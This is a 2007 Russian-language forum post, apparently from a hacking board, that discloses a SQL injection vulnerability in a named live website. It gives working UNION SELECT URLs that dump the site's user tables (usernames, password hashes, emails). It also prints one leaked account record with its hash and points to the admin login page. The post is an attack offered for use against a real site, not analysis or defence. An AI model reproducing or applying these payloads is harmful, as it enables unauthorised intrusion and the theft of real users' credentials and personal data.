07.05.2007, 21:31
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-inj
Кафедра КВН
Сайт: http://www.kafedra.com.ua/
уязвимость: http://www.kafedra.com.ua/modules/dictionary/detail.php?id=885'
таблица: xoops_users
подобранные поля: uname,pass,email,uid
26 организмов
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pa ss,email),5,6+from+xoops_users/*
1:insight:af743111422bd5bb3e8bd5618b12bbae
админка
http://www.kafedra.com.ua/admin.php
таблица: ibf_members
подобранные поля: name,password,email,id
3121 организм
http://www.kafedra.com.ua/modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,id,name,pass word,email,website),5,6+from+ibf_members/**
На сайте поставили новый форум vBulletin, от него таблицы не нашел.
|
|
|